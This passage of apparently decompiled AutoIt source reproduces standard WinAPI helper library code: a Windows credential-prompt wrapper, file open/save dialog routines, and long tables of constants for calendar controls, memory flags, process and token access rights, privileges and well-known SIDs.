$IAUTHERROR = 0 , $BSAVE = FALSE , $IPACKAGE = 0 , $HPARENT = 0 ) IF NOT __DLL ("credui.dll" ) THEN RETURN SETERROR (103 , 0 , 0 ) LOCAL $TBLOB = 0 , $ARET IF STRINGLEN ($SUSER ) THEN $ARET = DLLCALL ("credui.dll" , "bool" , "CredPackAuthenticationBufferW" , "dword" , 1 , "wstr" , $SUSER , "wstr" , $SPASSWORD , "ptr" , 0 , "dword*" , 0 ) IF @ERROR OR NOT $ARET [5 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) $TBLOB = DLLSTRUCTCREATE ("byte[" & $ARET [5 ] & "]" ) $ARET = DLLCALL ("credui.dll" , "bool" , "CredPackAuthenticationBufferW" , "dword" , 1 , "wstr" , $SUSER , "wstr" , $SPASSWORD , "struct*" , $TBLOB , "dword*" , $ARET [5 ] ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) ENDIF LOCAL $TINFO = DLLSTRUCTCREATE ("dword;hwnd;ptr;ptr;ptr;wchar[" & (STRINGLEN ($SMESSAGE ) + 1 ) & "];wchar[" & (STRINGLEN ($SCAPTION ) + 1 ) & "]" ) DLLSTRUCTSETDATA ($TINFO , 1 , DLLSTRUCTGETPTR ($TINFO , 6 ) - DLLSTRUCTGETPTR ($TINFO ) ) DLLSTRUCTSETDATA ($TINFO , 2 , $HPARENT ) DLLSTRUCTSETDATA ($TINFO , 3 , DLLSTRUCTGETPTR ($TINFO , 6 ) ) DLLSTRUCTSETDATA ($TINFO , 4 , DLLSTRUCTGETPTR ($TINFO , 7 ) ) DLLSTRUCTSETDATA ($TINFO , 5 , 0 ) DLLSTRUCTSETDATA ($TINFO , 6 , $SMESSAGE ) DLLSTRUCTSETDATA ($TINFO , 7 , $SCAPTION ) $ARET = DLLCALL ("credui.dll" , "dword" , "CredUIPromptForWindowsCredentialsW" , "struct*" , $TINFO , "dword" , $IAUTHERROR , "ulong*" , $IPACKAGE , "struct*" , $TBLOB , "ulong" , DLLSTRUCTGETSIZE ($TBLOB ) , "ptr*" , 0 , "ulong*" , 0 , "bool*" , $BSAVE , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR + 30 , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (30 , $ARET [0 ] , 0 ) LOCAL $ARESULT [4 ] , $IERROR = 0 $ARESULT [2 ] = $ARET [8 ] $ARESULT [3 ] = $ARET [3 ] LOCAL $PBLOB = $ARET [6 ] LOCAL $ISIZE = $ARET [7 ] $ARET = DLLCALL ("credui.dll" , "bool" , "CredUnPackAuthenticationBufferW" , "dword" , 1 , "ptr" , $PBLOB , "dword" , $ISIZE , "wstr" , "" , "dword*" , 4096 , "wstr" , "" , "dword*" , 4096 , "wstr" , "" , "dword*" , 4096 ) IF NOT @ERROR AND $ARET [0 ] THEN $ARESULT [0 ] = $ARET [4 ] $ARESULT [1 ] = $ARET [8 ] ELSE $IERROR = @ERROR + 40 ENDIF IF NOT _WINAPI_ZEROMEMORY ($PBLOB , $ISIZE ) THEN ENDIF _WINAPI_COTASKMEMFREE ($PBLOB ) IF $IERROR THEN RETURN SETERROR ($IERROR , 0 , 0 ) RETURN $ARESULT ENDFUNC #EndRegion Public Functions #Region Internal Functions FUNC __OFNDLG ($IDLG , $STITLE , $SINITDIR , $SFILTERS , $IDEFFILTER , $SDEFFILE , $SDEFEXT , $IFLAGS , $IFLAGSEX , $POFNPROC , $PDATA , $HPARENT ) LOCAL $TBUFFER = DLLSTRUCTCREATE ("wchar[32768]" ) LOCAL $TFILTERS = 0 , $TDEFEXT = 0 , $TINITDIR = 0 , $TTITLE = 0 LOCAL $TOFN = DLLSTRUCTCREATE ($TAGOPENFILENAME ) DLLSTRUCTSETDATA ($TOFN , "StructSize" , DLLSTRUCTGETSIZE ($TOFN ) ) DLLSTRUCTSETDATA ($TOFN , "hwndOwner" , $HPARENT ) DLLSTRUCTSETDATA ($TOFN , 3 , 0 ) LOCAL $ADATA = STRINGSPLIT ($SFILTERS , "|" ) LOCAL $AFILTERS [$ADATA [0 ] * 2 ] LOCAL $ICOUNT = 0 FOR $I = 1 TO $ADATA [0 ] $AFILTERS [$ICOUNT + 0 ] = STRINGSTRIPWS ($ADATA [$I ] , $STR_STRIPLEADING + $STR_STRIPTRAILING ) $AFILTERS [$ICOUNT + 1 ] = STRINGSTRIPWS (STRINGREGEXPREPLACE ($ADATA [$I ] , ".*$(.*)$" , "\1" ) , $STR_STRIPALL ) IF $AFILTERS [$ICOUNT + 1 ] THEN $ICOUNT += 2 ENDIF NEXT IF $ICOUNT THEN $TFILTERS = _WINAPI_ARRAYTOSTRUCT ($AFILTERS , 0 , $ICOUNT + 4294967295 ) IF @ERROR THEN ENDIF ENDIF DLLSTRUCTSETDATA ($TOFN , "lpstrFilter" , DLLSTRUCTGETPTR ($TFILTERS ) ) DLLSTRUCTSETDATA ($TOFN , 5 , 0 ) DLLSTRUCTSETDATA ($TOFN , 6 , 0 ) DLLSTRUCTSETDATA ($TOFN , "nFilterIndex" , $IDEFFILTER ) $SDEFFILE = STRINGSTRIPWS ($SDEFFILE , $STR_STRIPLEADING + $STR_STRIPTRAILING ) IF $SDEFFILE THEN DLLSTRUCTSETDATA ($TBUFFER , 1 , $SDEFFILE ) ENDIF DLLSTRUCTSETDATA ($TOFN , "lpstrFile" , DLLSTRUCTGETPTR ($TBUFFER ) ) DLLSTRUCTSETDATA ($TOFN , "nMaxFile" , 32768 ) DLLSTRUCTSETDATA ($TOFN , 10 , 0 ) DLLSTRUCTSETDATA ($TOFN , 11 , 0 ) $SINITDIR = STRINGSTRIPWS ($SINITDIR , $STR_STRIPLEADING + $STR_STRIPTRAILING ) IF $SINITDIR THEN $TINITDIR = DLLSTRUCTCREATE ("wchar[" & (STRINGLEN ($SINITDIR ) + 1 ) & "]" ) ENDIF DLLSTRUCTSETDATA ($TINITDIR , 1 , $SINITDIR ) DLLSTRUCTSETDATA ($TOFN , "lpstrInitialDir" , DLLSTRUCTGETPTR ($TINITDIR ) ) $STITLE = STRINGSTRIPWS ($STITLE , $STR_STRIPLEADING + $STR_STRIPTRAILING ) IF $STITLE THEN $TTITLE = DLLSTRUCTCREATE ("wchar[" & (STRINGLEN ($STITLE ) + 1 ) & "]" ) ENDIF DLLSTRUCTSETDATA ($TTITLE , 1 , $STITLE ) DLLSTRUCTSETDATA ($TOFN , "lpstrTitle" , DLLSTRUCTGETPTR ($TTITLE ) ) DLLSTRUCTSETDATA ($TOFN , "Flags" , $IFLAGS ) DLLSTRUCTSETDATA ($TOFN , 15 , 0 ) DLLSTRUCTSETDATA ($TOFN , 16 , 0 ) $SDEFEXT = STRINGSTRIPWS ($SDEFEXT , $STR_STRIPLEADING + $STR_STRIPTRAILING ) IF $SDEFEXT THEN $TDEFEXT = DLLSTRUCTCREATE ("wchar[" & (STRINGLEN ($TDEFEXT ) + 1 ) & "]" ) ENDIF DLLSTRUCTSETDATA ($TDEFEXT , 1 , STRINGREPLACE ($SDEFEXT , "." , "" ) ) DLLSTRUCTSETDATA ($TOFN , "lpstrDefExt" , DLLSTRUCTGETPTR ($TDEFEXT ) ) DLLSTRUCTSETDATA ($TOFN , "lCustData" , $PDATA ) DLLSTRUCTSETDATA ($TOFN , "lpfnHook" , $POFNPROC ) DLLSTRUCTSETDATA ($TOFN , 20 , 0 ) DLLSTRUCTSETDATA ($TOFN , 21 , 0 ) DLLSTRUCTSETDATA ($TOFN , 22 , 0 ) DLLSTRUCTSETDATA ($TOFN , "FlagsEx" , $IFLAGSEX ) LOCAL $ARET SWITCH $IDLG CASE 0 $ARET = DLLCALL ("comdlg32.dll" , "bool" , "GetOpenFileNameW" , "struct*" , $TOFN ) CASE 1 $ARET = DLLCALL ("comdlg32.dll" , "bool" , "GetSaveFileNameW" , "struct*" , $TOFN ) CASE ELSE ENDSWITCH IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF NOT $ARET [0 ] THEN RETURN SETERROR (10 , _WINAPI_COMMDLGEXTENDEDERROREX () , "" ) IF BITAND ($IFLAGS , $OFN_ALLOWMULTISELECT ) THEN IF BITAND ($IFLAGS , $OFN_EXPLORER ) THEN $ADATA = _WINAPI_STRUCTTOARRAY ($TBUFFER ) IF @ERROR THEN RETURN SETERROR (11 , 0 , "" ) ENDIF ELSE $ADATA = STRINGSPLIT (DLLSTRUCTGETDATA ($TBUFFER , 1 ) , " " ) ENDIF SWITCH $ADATA [0 ] CASE 0 RETURN SETERROR (12 , 0 , "" ) CASE 1 CASE ELSE LOCAL $SPATH = $ADATA [1 ] FOR $I = 2 TO $ADATA [0 ] $ADATA [$I + 4294967295 ] = _WINAPI_PATHAPPEND ($SPATH , $ADATA [$I ] ) NEXT REDIM $ADATA [$ADATA [0 ] ] $ADATA [0 ] -= 1 ENDSWITCH ELSE $ADATA = DLLSTRUCTGETDATA ($TBUFFER , 1 ) ENDIF $__G_VEXT = $TOFN RETURN $ADATA ENDFUNC FUNC __WINAPI_PARSEMULTISELECTFILEDIALOGPATH ($APATH ) LOCAL $AFILES [UBOUND ($APATH ) + 1 ] $AFILES [0 ] = UBOUND ($APATH ) $AFILES [1 ] = STRINGMID ($APATH [1 ] , 1 , STRINGINSTR ($APATH [1 ] , "\" , $STR_NOCASESENSEBASIC , + 4294967295 ) + 4294967295 ) FOR $I = 1 TO UBOUND ($APATH ) + 4294967295 $AFILES [$I + 1 ] = STRINGMID ($APATH [$I ] , STRINGINSTR ($APATH [$I ] , "\" , $STR_NOCASESENSEBASIC , + 4294967295 ) + 1 ) NEXT RETURN $AFILES ENDFUNC FUNC __WINAPI_PARSEFILEDIALOGPATH ($SPATH ) LOCAL $AFILES [3 ] $AFILES [0 ] = 2 $AFILES [1 ] = STRINGMID ($SPATH , 1 , STRINGINSTR ($SPATH , "\" , $STR_NOCASESENSEBASIC , + 4294967295 ) + 4294967295 ) $AFILES [2 ] = STRINGMID ($SPATH , STRINGINSTR ($SPATH , "\" , $STR_NOCASESENSEBASIC , + 4294967295 ) + 1 ) RETURN $AFILES ENDFUNC #EndRegion Internal Functions GLOBAL CONST $DTS_SHORTDATEFORMAT = 0 GLOBAL CONST $DTS_UPDOWN = 1 GLOBAL CONST $DTS_SHOWNONE = 2 GLOBAL CONST $DTS_LONGDATEFORMAT = 4 GLOBAL CONST $DTS_TIMEFORMAT = 9 GLOBAL CONST $DTS_RIGHTALIGN = 32 GLOBAL CONST $DTS_SHORTDATECENTURYFORMAT = 12 GLOBAL CONST $DTS_APPCANPARSE = 16 GLOBAL CONST $DMW_LONGNAME = 0 GLOBAL CONST $DMW_SHORTNAME = 1 GLOBAL CONST $DMW_LOCALE_LONGNAME = 2 GLOBAL CONST $DMW_LOCALE_SHORTNAME = 3 GLOBAL CONST $GDT_ERROR = + 4294967295 GLOBAL CONST $GDT_VALID = 0 GLOBAL CONST $GDT_NONE = 1 GLOBAL CONST $GDTR_MIN = 1 GLOBAL CONST $GDTR_MAX = 2 GLOBAL CONST $MCHT_NOWHERE = 0 GLOBAL CONST $MCHT_TITLE = 65536 GLOBAL CONST $MCHT_CALENDAR = 131072 GLOBAL CONST $MCHT_TODAYLINK = 196608 GLOBAL CONST $MCHT_NEXT = 16777216 GLOBAL CONST $MCHT_PREV = 33554432 GLOBAL CONST $MCHT_TITLEBK = 65536 GLOBAL CONST $MCHT_TITLEMONTH = 65537 GLOBAL CONST $MCHT_TITLEYEAR = 65538 GLOBAL CONST $MCHT_TITLEBTNNEXT = 16842755 GLOBAL CONST $MCHT_TITLEBTNPREV = 33619971 GLOBAL CONST $MCHT_CALENDARBK = 131072 GLOBAL CONST $MCHT_CALENDARDATE = 131073 GLOBAL CONST $MCHT_CALENDARDAY = 131074 GLOBAL CONST $MCHT_CALENDARWEEKNUM = 131075 GLOBAL CONST $MCHT_CALENDARDATENEXT = 16908288 GLOBAL CONST $MCHT_CALENDARDATEPREV = 33685504 GLOBAL CONST $MCS_DAYSTATE = 1 GLOBAL CONST $MCS_MULTISELECT = 2 GLOBAL CONST $MCS_WEEKNUMBERS = 4 GLOBAL CONST $MCS_NOTODAYCIRCLE = 8 GLOBAL CONST $MCS_NOTODAY = 16 GLOBAL CONST $MCS_NOTRAILINGDATES = 64 GLOBAL CONST $MCS_SHORTDAYSOFWEEK = 128 GLOBAL CONST $MCS_NOSELCHANGEONNAV = 256 GLOBAL CONST $MCM_FIRST = 4096 GLOBAL CONST $MCM_GETCALENDARBORDER = ($MCM_FIRST + 31 ) GLOBAL CONST $MCM_GETCALENDARCOUNT = ($MCM_FIRST + 23 ) GLOBAL CONST $MCM_GETCALENDARGRIDINFO = ($MCM_FIRST + 24 ) GLOBAL CONST $MCM_GETCALID = ($MCM_FIRST + 27 ) GLOBAL CONST $MCM_GETCOLOR = ($MCM_FIRST + 11 ) GLOBAL CONST $MCM_GETCURRENTVIEW = ($MCM_FIRST + 22 ) GLOBAL CONST $MCM_GETCURSEL = ($MCM_FIRST + 1 ) GLOBAL CONST $MCM_GETFIRSTDAYOFWEEK = ($MCM_FIRST + 16 ) GLOBAL CONST $MCM_GETMAXSELCOUNT = ($MCM_FIRST + 3 ) GLOBAL CONST $MCM_GETMAXTODAYWIDTH = ($MCM_FIRST + 21 ) GLOBAL CONST $MCM_GETMINREQRECT = ($MCM_FIRST + 9 ) GLOBAL CONST $MCM_GETMONTHDELTA = ($MCM_FIRST + 19 ) GLOBAL CONST $MCM_GETMONTHRANGE = ($MCM_FIRST + 7 ) GLOBAL CONST $MCM_GETRANGE = ($MCM_FIRST + 17 ) GLOBAL CONST $MCM_GETSELRANGE = ($MCM_FIRST + 5 ) GLOBAL CONST $MCM_GETTODAY = ($MCM_FIRST + 13 ) GLOBAL CONST $MCM_GETUNICODEFORMAT = 8192 + 6 GLOBAL CONST $MCM_HITTEST = ($MCM_FIRST + 14 ) GLOBAL CONST $MCM_SETCALENDARBORDER = ($MCM_FIRST + 30 ) GLOBAL CONST $MCM_SETCALID = ($MCM_FIRST + 28 ) GLOBAL CONST $MCM_SETCOLOR = ($MCM_FIRST + 10 ) GLOBAL CONST $MCM_SETCURRENTVIEW = ($MCM_FIRST + 32 ) GLOBAL CONST $MCM_SETCURSEL = ($MCM_FIRST + 2 ) GLOBAL CONST $MCM_SETDAYSTATE = ($MCM_FIRST + 8 ) GLOBAL CONST $MCM_SETFIRSTDAYOFWEEK = ($MCM_FIRST + 15 ) GLOBAL CONST $MCM_SETMAXSELCOUNT = ($MCM_FIRST + 4 ) GLOBAL CONST $MCM_SETMONTHDELTA = ($MCM_FIRST + 20 ) GLOBAL CONST $MCM_SETRANGE = ($MCM_FIRST + 18 ) GLOBAL CONST $MCM_SETSELRANGE = ($MCM_FIRST + 6 ) GLOBAL CONST $MCM_SETTODAY = ($MCM_FIRST + 12 ) GLOBAL CONST $MCM_SETUNICODEFORMAT = 8192 + 5 GLOBAL CONST $MCM_SIZERECTTOMIN = ($MCM_FIRST + 29 ) GLOBAL CONST $MCN_FIRST = + 4294966550 GLOBAL CONST $MCN_SELCHANGE = ($MCN_FIRST + 4294967293 ) GLOBAL CONST $MCN_GETDAYSTATE = ($MCN_FIRST + 4294967295 ) GLOBAL CONST $MCN_SELECT = ($MCN_FIRST ) GLOBAL CONST $MCN_VIEWCHANGE = ($MCN_FIRST + 4294967292 ) GLOBAL CONST $MCSC_BACKGROUND = 0 GLOBAL CONST $MCSC_MONTHBK = 4 GLOBAL CONST $MCSC_TEXT = 1 GLOBAL CONST $MCSC_TITLEBK = 2 GLOBAL CONST $MCSC_TITLETEXT = 3 GLOBAL CONST $MCSC_TRAILINGTEXT = 5 GLOBAL CONST $DTM_FIRST = 4096 GLOBAL CONST $DTM_GETSYSTEMTIME = $DTM_FIRST + 1 GLOBAL CONST $DTM_SETSYSTEMTIME = $DTM_FIRST + 2 GLOBAL CONST $DTM_GETRANGE = $DTM_FIRST + 3 GLOBAL CONST $DTM_SETRANGE = $DTM_FIRST + 4 GLOBAL CONST $DTM_SETFORMAT = $DTM_FIRST + 5 GLOBAL CONST $DTM_SETMCCOLOR = $DTM_FIRST + 6 GLOBAL CONST $DTM_GETMCCOLOR = $DTM_FIRST + 7 GLOBAL CONST $DTM_GETMONTHCAL = $DTM_FIRST + 8 GLOBAL CONST $DTM_SETMCFONT = $DTM_FIRST + 9 GLOBAL CONST $DTM_GETMCFONT = $DTM_FIRST + 10 GLOBAL CONST $DTM_SETFORMATW = $DTM_FIRST + 50 GLOBAL CONST $DTN_FIRST = + 4294966556 GLOBAL CONST $DTN_FIRST2 = + 4294966543 GLOBAL CONST $DTN_DATETIMECHANGE = $DTN_FIRST2 + 4294967290 GLOBAL CONST $DTN_USERSTRING = $DTN_FIRST2 + 4294967291 GLOBAL CONST $DTN_WMKEYDOWN = $DTN_FIRST2 + 4294967292 GLOBAL CONST $DTN_FORMAT = $DTN_FIRST2 + 4294967293 GLOBAL CONST $DTN_FORMATQUERY = $DTN_FIRST2 + 4294967294 GLOBAL CONST $DTN_DROPDOWN = $DTN_FIRST2 + 4294967295 GLOBAL CONST $DTN_CLOSEUP = $DTN_FIRST2 + 0 GLOBAL CONST $DTN_USERSTRINGW = $DTN_FIRST + 4294967291 GLOBAL CONST $DTN_WMKEYDOWNW = $DTN_FIRST + 4294967292 GLOBAL CONST $DTN_FORMATW = $DTN_FIRST + 4294967293 GLOBAL CONST $DTN_FORMATQUERYW = $DTN_FIRST + 4294967294 GLOBAL CONST $GUI_SS_DEFAULT_DATE = $DTS_LONGDATEFORMAT GLOBAL CONST $GUI_SS_DEFAULT_MONTHCAL = 0 GLOBAL CONST $GMEM_FIXED = 0 GLOBAL CONST $GMEM_MOVEABLE = 2 GLOBAL CONST $GMEM_NOCOMPACT = 16 GLOBAL CONST $GMEM_NODISCARD = 32 GLOBAL CONST $GMEM_ZEROINIT = 64 GLOBAL CONST $GMEM_MODIFY = 128 GLOBAL CONST $GMEM_DISCARDABLE = 256 GLOBAL CONST $GMEM_NOT_BANKED = 4096 GLOBAL CONST $GMEM_SHARE = 8192 GLOBAL CONST $GMEM_DDESHARE = 8192 GLOBAL CONST $GMEM_NOTIFY = 16384 GLOBAL CONST $GMEM_LOWER = 4096 GLOBAL CONST $GMEM_VALID_FLAGS = 32626 GLOBAL CONST $GMEM_INVALID_HANDLE = 32768 GLOBAL CONST $GPTR = BITOR ($GMEM_FIXED , $GMEM_ZEROINIT ) GLOBAL CONST $GHND = BITOR ($GMEM_MOVEABLE , $GMEM_ZEROINIT ) GLOBAL CONST $MEM_COMMIT = 4096 GLOBAL CONST $MEM_RESERVE = 8192 GLOBAL CONST $MEM_TOP_DOWN = 1048576 GLOBAL CONST $MEM_SHARED = 134217728 GLOBAL CONST $PAGE_NOACCESS = 1 GLOBAL CONST $PAGE_READONLY = 2 GLOBAL CONST $PAGE_READWRITE = 4 GLOBAL CONST $PAGE_EXECUTE = 16 GLOBAL CONST $PAGE_EXECUTE_READ = 32 GLOBAL CONST $PAGE_EXECUTE_READWRITE = 64 GLOBAL CONST $PAGE_EXECUTE_WRITECOPY = 128 GLOBAL CONST $PAGE_GUARD = 256 GLOBAL CONST $PAGE_NOCACHE = 512 GLOBAL CONST $PAGE_WRITECOMBINE = 1024 GLOBAL CONST $PAGE_WRITECOPY = 8 GLOBAL CONST $MEM_DECOMMIT = 16384 GLOBAL CONST $MEM_RELEASE = 32768 GLOBAL ENUM $MEM_LOAD , $MEM_TOTALPHYSRAM , $MEM_AVAILPHYSRAM , $MEM_TOTALPAGEFILE , $MEM_AVAILPAGEFILE , $MEM_TOTALVIRTUAL , $MEM_AVAILVIRTUAL GLOBAL CONST $PROCESS_TERMINATE = 1 GLOBAL CONST $PROCESS_CREATE_THREAD = 2 GLOBAL CONST $PROCESS_SET_SESSIONID = 4 GLOBAL CONST $PROCESS_VM_OPERATION = 8 GLOBAL CONST $PROCESS_VM_READ = 16 GLOBAL CONST $PROCESS_VM_WRITE = 32 GLOBAL CONST $PROCESS_DUP_HANDLE = 64 GLOBAL CONST $PROCESS_CREATE_PROCESS = 128 GLOBAL CONST $PROCESS_SET_QUOTA = 256 GLOBAL CONST $PROCESS_SET_INFORMATION = 512 GLOBAL CONST $PROCESS_QUERY_INFORMATION = 1024 GLOBAL CONST $PROCESS_QUERY_LIMITED_INFORMATION = 4096 GLOBAL CONST $PROCESS_SUSPEND_RESUME = 2048 GLOBAL CONST $PROCESS_ALL_ACCESS = 2035711 GLOBAL CONST $SE_ASSIGNPRIMARYTOKEN_NAME = "SeAssignPrimaryTokenPrivilege" GLOBAL CONST $SE_AUDIT_NAME = "SeAuditPrivilege" GLOBAL CONST $SE_BACKUP_NAME = "SeBackupPrivilege" GLOBAL CONST $SE_CHANGE_NOTIFY_NAME = "SeChangeNotifyPrivilege" GLOBAL CONST $SE_CREATE_GLOBAL_NAME = "SeCreateGlobalPrivilege" GLOBAL CONST $SE_CREATE_PAGEFILE_NAME = "SeCreatePagefilePrivilege" GLOBAL CONST $SE_CREATE_PERMANENT_NAME = "SeCreatePermanentPrivilege" GLOBAL CONST $SE_CREATE_SYMBOLIC_LINK_NAME = "SeCreateSymbolicLinkPrivilege" GLOBAL CONST $SE_CREATE_TOKEN_NAME = "SeCreateTokenPrivilege" GLOBAL CONST $SE_DEBUG_NAME = "SeDebugPrivilege" GLOBAL CONST $SE_ENABLE_DELEGATION_NAME = "SeEnableDelegationPrivilege" GLOBAL CONST $SE_IMPERSONATE_NAME = "SeImpersonatePrivilege" GLOBAL CONST $SE_INC_BASE_PRIORITY_NAME = "SeIncreaseBasePriorityPrivilege" GLOBAL CONST $SE_INC_WORKING_SET_NAME = "SeIncreaseWorkingSetPrivilege" GLOBAL CONST $SE_INCREASE_QUOTA_NAME = "SeIncreaseQuotaPrivilege" GLOBAL CONST $SE_LOAD_DRIVER_NAME = "SeLoadDriverPrivilege" GLOBAL CONST $SE_LOCK_MEMORY_NAME = "SeLockMemoryPrivilege" GLOBAL CONST $SE_MACHINE_ACCOUNT_NAME = "SeMachineAccountPrivilege" GLOBAL CONST $SE_MANAGE_VOLUME_NAME = "SeManageVolumePrivilege" GLOBAL CONST $SE_PROF_SINGLE_PROCESS_NAME = "SeProfileSingleProcessPrivilege" GLOBAL CONST $SE_RELABEL_NAME = "SeRelabelPrivilege" GLOBAL CONST $SE_REMOTE_SHUTDOWN_NAME = "SeRemoteShutdownPrivilege" GLOBAL CONST $SE_RESTORE_NAME = "SeRestorePrivilege" GLOBAL CONST $SE_SECURITY_NAME = "SeSecurityPrivilege" GLOBAL CONST $SE_SHUTDOWN_NAME = "SeShutdownPrivilege" GLOBAL CONST $SE_SYNC_AGENT_NAME = "SeSyncAgentPrivilege" GLOBAL CONST $SE_SYSTEM_ENVIRONMENT_NAME = "SeSystemEnvironmentPrivilege" GLOBAL CONST $SE_SYSTEM_PROFILE_NAME = "SeSystemProfilePrivilege" GLOBAL CONST $SE_SYSTEMTIME_NAME = "SeSystemtimePrivilege" GLOBAL CONST $SE_TAKE_OWNERSHIP_NAME = "SeTakeOwnershipPrivilege" GLOBAL CONST $SE_TCB_NAME = "SeTcbPrivilege" GLOBAL CONST $SE_TIME_ZONE_NAME = "SeTimeZonePrivilege" GLOBAL CONST $SE_TRUSTED_CREDMAN_ACCESS_NAME = "SeTrustedCredManAccessPrivilege" GLOBAL CONST $SE_UNSOLICITED_INPUT_NAME = "SeUnsolicitedInputPrivilege" GLOBAL CONST $SE_UNDOCK_NAME = "SeUndockPrivilege" GLOBAL CONST $SE_PRIVILEGE_ENABLED_BY_DEFAULT = 1 GLOBAL CONST $SE_PRIVILEGE_ENABLED = 2 GLOBAL CONST $SE_PRIVILEGE_REMOVED = 4 GLOBAL CONST $SE_PRIVILEGE_USED_FOR_ACCESS = 2147483648 GLOBAL CONST $SE_GROUP_MANDATORY = 1 GLOBAL CONST $SE_GROUP_ENABLED_BY_DEFAULT = 2 GLOBAL CONST $SE_GROUP_ENABLED = 4 GLOBAL CONST $SE_GROUP_OWNER = 8 GLOBAL CONST $SE_GROUP_USE_FOR_DENY_ONLY = 16 GLOBAL CONST $SE_GROUP_INTEGRITY = 32 GLOBAL CONST $SE_GROUP_INTEGRITY_ENABLED = 64 GLOBAL CONST $SE_GROUP_RESOURCE = 536870912 GLOBAL CONST $SE_GROUP_LOGON_ID = 3221225472 GLOBAL ENUM $TOKENPRIMARY = 1 , $TOKENIMPERSONATION GLOBAL ENUM $SECURITYANONYMOUS = 0 , $SECURITYIDENTIFICATION , $SECURITYIMPERSONATION , $SECURITYDELEGATION GLOBAL ENUM $TOKENUSER = 1 , $TOKENGROUPS , $TOKENPRIVILEGES , $TOKENOWNER , $TOKENPRIMARYGROUP , $TOKENDEFAULTDACL , $TOKENSOURCE , $TOKENTYPE , $TOKENIMPERSONATIONLEVEL , $TOKENSTATISTICS , $TOKENRESTRICTEDSIDS , $TOKENSESSIONID , $TOKENGROUPSANDPRIVILEGES , $TOKENSESSIONREFERENCE , $TOKENSANDBOXINERT , $TOKENAUDITPOLICY , $TOKENORIGIN , $TOKENELEVATIONTYPE , $TOKENLINKEDTOKEN , $TOKENELEVATION , $TOKENHASRESTRICTIONS , $TOKENACCESSINFORMATION , $TOKENVIRTUALIZATIONALLOWED , $TOKENVIRTUALIZATIONENABLED , $TOKENINTEGRITYLEVEL , $TOKENUIACCESS , $TOKENMANDATORYPOLICY , $TOKENLOGONSID GLOBAL CONST $TOKEN_ASSIGN_PRIMARY = 1 GLOBAL CONST $TOKEN_DUPLICATE = 2 GLOBAL CONST $TOKEN_IMPERSONATE = 4 GLOBAL CONST $TOKEN_QUERY = 8 GLOBAL CONST $TOKEN_QUERY_SOURCE = 16 GLOBAL CONST $TOKEN_ADJUST_PRIVILEGES = 32 GLOBAL CONST $TOKEN_ADJUST_GROUPS = 64 GLOBAL CONST $TOKEN_ADJUST_DEFAULT = 128 GLOBAL CONST $TOKEN_ADJUST_SESSIONID = 256 GLOBAL CONST $TOKEN_ALL_ACCESS = 983551 GLOBAL CONST $TOKEN_READ = 131080 GLOBAL CONST $TOKEN_WRITE = 131296 GLOBAL CONST $TOKEN_EXECUTE = 131072 GLOBAL CONST $TOKEN_HAS_TRAVERSE_PRIVILEGE = 1 GLOBAL CONST $TOKEN_HAS_BACKUP_PRIVILEGE = 2 GLOBAL CONST $TOKEN_HAS_RESTORE_PRIVILEGE = 4 GLOBAL CONST $TOKEN_HAS_ADMIN_GROUP = 8 GLOBAL CONST $TOKEN_IS_RESTRICTED = 16 GLOBAL CONST $TOKEN_SESSION_NOT_REFERENCED = 32 GLOBAL CONST $TOKEN_SANDBOX_INERT = 64 GLOBAL CONST $TOKEN_HAS_IMPERSONATE_PRIVILEGE = 128 GLOBAL CONST $RIGHTS_DELETE = 65536 GLOBAL CONST $READ_CONTROL = 131072 GLOBAL CONST $WRITE_DAC = 262144 GLOBAL CONST $WRITE_OWNER = 524288 GLOBAL CONST $SYNCHRONIZE = 1048576 GLOBAL CONST $ACCESS_SYSTEM_SECURITY = 16777216 GLOBAL CONST $STANDARD_RIGHTS_REQUIRED = 983040 GLOBAL CONST $STANDARD_RIGHTS_READ = $READ_CONTROL GLOBAL CONST $STANDARD_RIGHTS_WRITE = $READ_CONTROL GLOBAL CONST $STANDARD_RIGHTS_EXECUTE = $READ_CONTROL GLOBAL CONST $STANDARD_RIGHTS_ALL = 2031616 GLOBAL CONST $SPECIFIC_RIGHTS_ALL = 65535 GLOBAL ENUM $NOT_USED_ACCESS = 0 , $GRANT_ACCESS , $SET_ACCESS , $DENY_ACCESS , $REVOKE_ACCESS , $SET_AUDIT_SUCCESS , $SET_AUDIT_FAILURE GLOBAL ENUM $TRUSTEE_IS_UNKNOWN = 0 , $TRUSTEE_IS_USER , $TRUSTEE_IS_GROUP , $TRUSTEE_IS_DOMAIN , $TRUSTEE_IS_ALIAS , $TRUSTEE_IS_WELL_KNOWN_GROUP , $TRUSTEE_IS_DELETED , $TRUSTEE_IS_INVALID , $TRUSTEE_IS_COMPUTER GLOBAL CONST $LOGON_WITH_PROFILE = 1 GLOBAL CONST $LOGON_NETCREDENTIALS_ONLY = 2 GLOBAL ENUM $SIDTYPEUSER = 1 , $SIDTYPEGROUP , $SIDTYPEDOMAIN , $SIDTYPEALIAS , $SIDTYPEWELLKNOWNGROUP , $SIDTYPEDELETEDACCOUNT , $SIDTYPEINVALID , $SIDTYPEUNKNOWN , $SIDTYPECOMPUTER , $SIDTYPELABEL GLOBAL CONST $SID_ADMINISTRATORS = "S-1-5-32-544" GLOBAL CONST $SID_USERS = "S-1-5-32-545" GLOBAL CONST $SID_GUESTS = "S-1-5-32-546" GLOBAL CONST $SID_ACCOUNT_OPERATORS = "S-1-5-32-548" GLOBAL CONST $SID_SERVER_OPERATORS = "S-1-5-32-549" GLOBAL CONST $SID_PRINT_OPERATORS = "S-1-5-32-550" GLOBAL CONST $SID_BACKUP_OPERATORS = "S-1-5-32-551" GLOBAL CONST $SID_REPLICATOR = "S-1-5-32-552" GLOBAL CONST $SID_OWNER = "S-1-3-0" GLOBAL CONST $SID_EVERYONE = "S-1-1-0" GLOBAL CONST $SID_NETWORK = "S-1-5-2" GLOBAL CONST $SID_INTERACTIVE = "S-1-5-4" GLOBAL CONST $SID_SYSTEM = "S-1-5-18" GLOBAL CONST $SID_AUTHENTICATED_USERS = "S-1-5-11" GLOBAL CONST $SID_SCHANNEL_AUTHENTICATION = "S-1-5-64-14" GLOBAL CONST $SID_DIGEST_AUTHENTICATION = "S-1-5-64-21" GLOBAL CONST $SID_NT_SERVICE = "S-1-5-80" GLOBAL CONST $SID_UNTRUSTED_MANDATORY_LEVEL = 